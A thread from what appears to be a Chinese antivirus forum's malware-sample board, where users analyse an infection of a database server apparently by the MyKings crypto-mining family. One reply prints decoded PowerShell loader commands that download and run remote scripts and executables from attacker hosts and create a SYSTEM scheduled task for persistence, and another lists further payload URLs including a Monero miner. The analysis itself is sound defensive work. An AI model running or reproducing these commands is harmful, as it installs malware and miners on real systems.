数据库服务器病毒 8X

显示全部楼层 · 发表于 2022-6-7 22:42:31

本帖最后由 jiajia2010 于 2022-6-7 23:16 编辑

干了挺多事，楼主注意检查一下吧dll运行的时候会把楼主主机ip，登录信息等上传到病毒作者指定的服务器。

显示全部楼层 · 发表于 2022-6-8 09:01:36

LovelyTim 发表于 2022-6-7 10:24
火绒也提示处理了，但数据库密码和用户还是被改了

换个思路,有可能是通过数据库进去的

显示全部楼层 · 发表于 2022-6-8 09:12:09

联管kill all

显示全部楼层 · 发表于 2022-6-8 11:55:39

服务器建议装EES 带防火墙反正我觉得比较好用最高记录15分钟拦截3000多次攻击

显示全部楼层 · 发表于 2022-6-8 12:52:58

LovelyTim 发表于 2022-6-7 11:14
顺便把日志文件也放上来
因为是两次一样的病毒
就只放最新记录

Base64解码部分代码

IEX (New-Object Net.WebClient).DownloadString('http://mssql.loader0118.xyz:1433/mssql7.txt');

复制代码

显示全部楼层 · 发表于 2022-6-8 12:55:53

本帖最后由 Wesly.Zhang 于 2022-6-8 12:59 编辑

楼主，你这应该是中了敲竹杠吧？下载服务器指定文件，然后下载后更名存放，执行后防止重复运行，创建计划任务方便自己启动，关闭自身拉起的powershell等敏感操作。
当前upsupx2.exe无法下载，否则就能够静态分析看看到底是什么妖魔。

显示全部楼层 · 发表于 2022-6-8 13:21:41

Shake2333 发表于 2022-6-7 10:25
panda kill all

这个软件扫描太慢了，受不了，而且可玩性不多

显示全部楼层 · 发表于 2022-6-8 13:24:52

安天8个，全部杀

显示全部楼层 · 发表于 2022-6-8 13:48:13

本帖最后由 herofrederick 于 2022-6-8 14:20 编辑

IEX(New-ObjectNetWebClient)DownloadString('http://mssql.loader0118.xyz:1433/mssql7.txt');

mssql7.txt
net1.exe stop UI0Detect
IEX (New-Object Net.WebClient).DownloadString(('htqtp://77.73.69.34/Shell.txt' -replace 'q',''));
IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/download.txt')

download.txt
$client = new-object System.Net.WebClient
$client.DownloadFile('http://104.233.207.172:8172/upsupx2.exe','c:\windows\temp\conhoy.exe')
schtasks /run /tn oka
cmd /c taskkill /f /im conhoy.exe
cmd /c icacls c:\windows\temp\*.exe /reset
cmd /c schtasks /create /tn "MicrosoftsWindowsy" /tr "c:\windows\temp\conhoy.exe" /ru "system" /sc minute /mo 8 /f
schtasks /run /tn "MicrosoftsWindowsy"
cmd /c taskkill /f /im powershell.exe

估计是MyKings家族挖矿

明显是从web进来的然后通过sql执行的命令，要不然就是sql有弱口令

补充upsupx2请求http[:]//103.124.105.246/pld/cmd.txt
获取以下内容挨个下载

http[:]//103.145.106.242/upsupx2.exe|C:\windows\Temp\conhoy.exe|0http[:]//103.145.106.242/wmi.txt|C:\windows\Temp\wmia.bat|1http[:]//103.145.106.242/u.exe|C:\windows\Temp\u.exe|1http[:]//137.175.56.104/ntuser.rar|C:\windows\Temp\ntuser.dat|0http[:]//137.175.56.104/xmr1025.rar|c:\windows\inf\aspnet\lsma22.exe|0http[:]//137.175.56.104/20201117.rar|c:\windows\debug\item.dat|0

xmr1025挖矿程序
其他的懒的看
u.exe请求http[:]//172.83.155.170/ups.html获取ip 104.37.187.182
拼接后下载更多的exe和sys文件

显示全部楼层 · 发表于 2022-6-8 14:01:01

3955499 发表于 2022-6-7 22:26
卡巴kill all

不要重复测试谢谢

[病毒样本] 数据库服务器病毒 8X

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源